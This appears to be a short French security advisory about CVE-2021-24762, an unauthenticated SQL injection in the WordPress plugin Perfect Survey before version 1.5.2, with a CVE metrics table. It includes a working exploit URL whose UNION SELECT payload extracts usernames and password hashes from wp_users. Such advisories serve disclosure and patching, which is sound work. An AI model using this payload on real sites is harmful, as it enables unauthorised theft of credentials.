Faille CVE sur un plugin Wordpress Perfect Survey

Une faille critique CVE est exploitable sur le plugin WordPress Perfect Survey.

Pour info le plugin n’est plus disponible sur la plateforme wordpress à cause de la faille.

Les versions impactées sont celle < 1.5.2.

La version 1.5.2 fixe normalement le problème.

Nous sommes face à une faille de type injection SQL suite à une non vérification d’une variable sur une requête ajax.


Exemple d'atttaque sur la faille CVE Perfect Survey

				
					https://example.com/wp-admin/admin-ajax.php?action=get_question&question_id=1%20union%20select%201%2C1%2Cchar(116%2C101%2C120%2C116)%2Cuser_login%2Cuser_pass%2C0%2C0%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%20from%20wp_users
				
			
Information Valeur

CVE

CVE-2021-24762

CVE publié le

04/02/2022

Score

7.5

Fuite de données

Partielle

Intégrité Système

Partielle

Impact sur les ressources

Partielle

Compléxité

Facile

Authentification requise

Non